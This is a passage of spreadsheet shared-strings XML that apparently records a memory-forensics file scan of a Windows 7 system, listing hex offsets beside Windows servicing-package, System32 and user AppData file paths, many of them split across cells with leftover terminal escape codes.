    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde415f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_53_for_KB2574819~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde416038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~x86</t>
  </si>
  <si>
    <t>~en-US~6.1.76</t>
  </si>
  <si>
    <t>01.17514.mu</t>
  </si>
  <si>
    <t>m_x001B_[0K</t>
  </si>
  <si>
    <t>0xde416d18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2604115~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde417038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2732059~31bf3856ad364e35~x86~~6.1.5.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde418620</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1E698CCB2C296D265AC1A25397</t>
  </si>
  <si>
    <t>4E09FD_536880</t>
  </si>
  <si>
    <t>8B74600B60D</t>
  </si>
  <si>
    <t>4C3677</t>
  </si>
  <si>
    <t>FF64C1176_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4187f0</t>
  </si>
  <si>
    <t>\Windows\System32\userenv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41a038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{46A9A072-4332-1</t>
  </si>
  <si>
    <t>1E9-83AE-0800</t>
  </si>
  <si>
    <t>2710B8D0}.d</t>
  </si>
  <si>
    <t>at_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41a118</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2919469_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41a868</t>
  </si>
  <si>
    <t>\Windows\System32\IconCodecService.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41a990</t>
  </si>
  <si>
    <t>\Windows\System32\esentprf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41ac48</t>
  </si>
  <si>
    <t>\Windows\System32\ntshrui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41af18</t>
  </si>
  <si>
    <t>0xde41b038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41b140</t>
  </si>
  <si>
    <t>а¬°йњ¦_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41c038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-WMI-SNMP-Provider-Package~31bf3856ad364e35~x86~e</t>
  </si>
  <si>
    <t>n-US~6.1.7600</t>
  </si>
  <si>
    <t>.16385.mum_x001B_</t>
  </si>
  <si>
    <t>0xde41c290</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB3110329~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41c348</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Shell-HomeGroup-Package~31bf3856ad364e35~x86~~6.</t>
  </si>
  <si>
    <t>1.7600.16385.</t>
  </si>
  <si>
    <t>mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41cb28</t>
  </si>
  <si>
    <t>n-US~6.1.7601</t>
  </si>
  <si>
    <t>.17514.mum_x001B_</t>
  </si>
  <si>
    <t>0xde41cdb0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3013531~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41cf18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-PhotoBasicPackage~31bf3856ad364e35~x86~~6.1.7600</t>
  </si>
  <si>
    <t>.16385.mum_x001B_[0</t>
  </si>
  <si>
    <t>0xde41d310</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-WMPNetworkSharingService-Package~31bf3856ad364e3</t>
  </si>
  <si>
    <t>0xde41d3c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-WMI-SNMP-Provider-Package~31bf3856ad364e35~x86~~</t>
  </si>
  <si>
    <t>6.1.7600.1638</t>
  </si>
  <si>
    <t>0xde41d7b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SNMP-Package~31bf3856ad364e35~x86~en-US~6.1.7601</t>
  </si>
  <si>
    <t>.17514.mum_x001B_[0</t>
  </si>
  <si>
    <t>0xde41db98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SNMP-Package~31bf3856ad364e35~x86~en-US~6.1.7600</t>
  </si>
  <si>
    <t>0xde41dec8</t>
  </si>
  <si>
    <t>.1.7600.163</t>
  </si>
  <si>
    <t>85.mum</t>
  </si>
  <si>
    <t>0xde41df80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SNMP-Package~31bf3856ad364e35~x86~~6.1.7600.1638</t>
  </si>
  <si>
    <t>0xde41e038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SimpleTCP-Package~31bf3856ad364e35~x86~~6.1.7600</t>
  </si>
  <si>
    <t>0xde41e390</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SimpleTCP-Package~31bf3856ad364e35~x86~en-US~6.1</t>
  </si>
  <si>
    <t>.7601.17514.m</t>
  </si>
  <si>
    <t>um_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41e658</t>
  </si>
  <si>
    <t>~x86~~6.1.760</t>
  </si>
  <si>
    <t>0.16385.mum</t>
  </si>
  <si>
    <t>0xde41e778</t>
  </si>
  <si>
    <t>.7600.16385.m</t>
  </si>
  <si>
    <t>0xde41ea70</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-PhotoBasicPackage~31bf3856ad364e35~x86~en-US~6.1</t>
  </si>
  <si>
    <t>0xde41eb28</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Media-Foundation-Package~31bf3856ad364e35~x86~en-US~6.1.</t>
  </si>
  <si>
    <t>7600.16385.mu</t>
  </si>
  <si>
    <t>0xde41ef80</t>
  </si>
  <si>
    <t>5~x86~~6.1.76</t>
  </si>
  <si>
    <t>00.16385.mu</t>
  </si>
  <si>
    <t>0xde41f038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Help-Customization-Package~31bf3856ad364e35~x86~</t>
  </si>
  <si>
    <t>~6.1.7600.163</t>
  </si>
  <si>
    <t>85.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41f458</t>
  </si>
  <si>
    <t>en-US~6.1.760</t>
  </si>
  <si>
    <t>1.17514.mum</t>
  </si>
  <si>
    <t>0xde41f788</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2579686~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde41f840</t>
  </si>
  <si>
    <t>0xde41fad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-TabletPC-OC-Package~31bf3856ad364e35~x86~en-US~6</t>
  </si>
  <si>
    <t>.1.7601.17514</t>
  </si>
  <si>
    <t>0xde41fbf0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Media-Foundation-Package~31bf3856ad364e35~x86~~6.1.7600.</t>
  </si>
  <si>
    <t>16385.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde420038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_441_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde420360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3093513~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde420480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_426_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4207b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2973201~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde420868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_326_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde420c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RemoteAssistance-Package-Client~31bf3856ad364e35</t>
  </si>
  <si>
    <t>0xde421368</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2973201_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde421420</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_325_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde421808</t>
  </si>
  <si>
    <t>1.7600.1638</t>
  </si>
  <si>
    <t>5.mum_x001B_</t>
  </si>
  <si>
    <t>0xde421b50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_238_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde421eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3013531_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4222a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SearchEngine-Client-Package~31bf3856ad364e35~x86</t>
  </si>
  <si>
    <t>0xde422360</t>
  </si>
  <si>
    <t>0xde422690</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2973201~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde422748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_803_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde422b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_139_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde422df8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3093513_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde422f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_6_for_KB2970228~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4233c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3138910_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4235c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MediaCenter-Package~31bf3856ad364e35~x86~en-US~6</t>
  </si>
  <si>
    <t>0xde423680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2970228_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde423a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2970228~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde423e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB3006137~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4242a8</t>
  </si>
  <si>
    <t>0xde424360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3006137_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde424628</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3155178~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde424748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3006137~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde424a78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2631813_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde424b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_37_for_KB2731771~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde424f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2731771_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde425338</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_146_for_KB2731771~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde425668</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2631813~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde425720</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2731771_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde425a30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_207_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde425b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3161102~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde425f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2731771~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4262f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_32_for_KB2992611~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4263a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MobilePC-Client-Premium-Package~31bf3856ad364e35</t>
  </si>
  <si>
    <t>0xde426680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2533623~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4269b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2631813_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde426a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2533623_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde426e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_6_for_KB2533623~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde427240</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3115858~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde427360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2533623_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde427690</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2631813~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde427748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2533623~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde427b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_502_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde427f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_361_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde428280</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2579686~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde428338</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_76_for_KB2984976~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde428720</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB2984976~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde428b08</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2984976_SP1~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde428d50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_6_for_KB3110329~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde429280</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB3110329~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde429338</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2984976~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde429720</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_420_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4298b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3067903~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde429b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3067903_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde429f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_290_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde42a8c8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E887E036775F4159E2816B7B9E</t>
  </si>
  <si>
    <t>527E5F_DCA255</t>
  </si>
  <si>
    <t>556A91F9CD0</t>
  </si>
  <si>
    <t>F5848C</t>
  </si>
  <si>
    <t>C16B087EF_x001B_[0K</t>
  </si>
  <si>
    <t>0xde434038</t>
  </si>
  <si>
    <t>\Windows\System32\ntoskrnl.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde434658</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2579686~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4348a0</t>
  </si>
  <si>
    <t>0xde435458</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde435788</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3150220~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde435840</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3046017~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde435cb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_136_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4363c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2847927~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4366f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2918077_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4367b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2847927_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde436b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2847927~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde436ec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_277_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde436f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2847927_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde437110</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB4040980~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde437310</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_244_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4373c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2773072_SP1~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4377b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2773072~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde437ae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Server-Help-Package.ClientEnterprise~31bf3856ad364e35~x86~en-US~6.</t>
  </si>
  <si>
    <t>1.7601.17514.</t>
  </si>
  <si>
    <t>0xde437b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_9_for_KB2761217~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde437ec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-OpticalMediaDisc-Package~31bf3856ad364e35~x86~en</t>
  </si>
  <si>
    <t>-US~6.1.7601.</t>
  </si>
  <si>
    <t>17514.mum_x001B_[</t>
  </si>
  <si>
    <t>0xde437f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2761217_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde438108</t>
  </si>
  <si>
    <t>\Program Files\Common Files\microsoft shared\ink\en-US\mip.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4383a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2727528_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde438668</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3161102~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4389d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2579686_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde438d50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2919469~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde438f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3170735_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde439170</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3021917_SP1~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4394a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3150220_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde439558</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3021917~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde439940</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3006121~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde439ac0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SampleContent-Ringtones-Package~31bf3856ad364e35</t>
  </si>
  <si>
    <t>0xde439b78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2750841~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde439ec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_239_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde439f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3115858~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43a530</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2685939_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43a610</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2727528~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43aad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2758857_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43ae00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_77_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43aeb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2758857~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43d100</t>
  </si>
  <si>
    <t>0xde43d388</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_116_for_KB2773072~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43d6b8</t>
  </si>
  <si>
    <t>86~en-US~6.</t>
  </si>
  <si>
    <t>.16385.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43d770</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_85_for_KB2773072~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43d938</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Backup-Package~31bf3856ad364e35~x86~en-US~6.1.76</t>
  </si>
  <si>
    <t>01.17514.mum_x001B_</t>
  </si>
  <si>
    <t>0xde43dc00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3080149_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43dcb8</t>
  </si>
  <si>
    <t>00.16385.mum_x001B_</t>
  </si>
  <si>
    <t>0xde43e118</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MobilePC-Client-Basic-Package~31bf3856ad364e35~x</t>
  </si>
  <si>
    <t>86~en-US~6.1.</t>
  </si>
  <si>
    <t>7601.17514.</t>
  </si>
  <si>
    <t>mum_x001B_[0</t>
  </si>
  <si>
    <t>0xde43e238</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_99_for_KB2773072~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43e620</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB2773072~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43ea18</t>
  </si>
  <si>
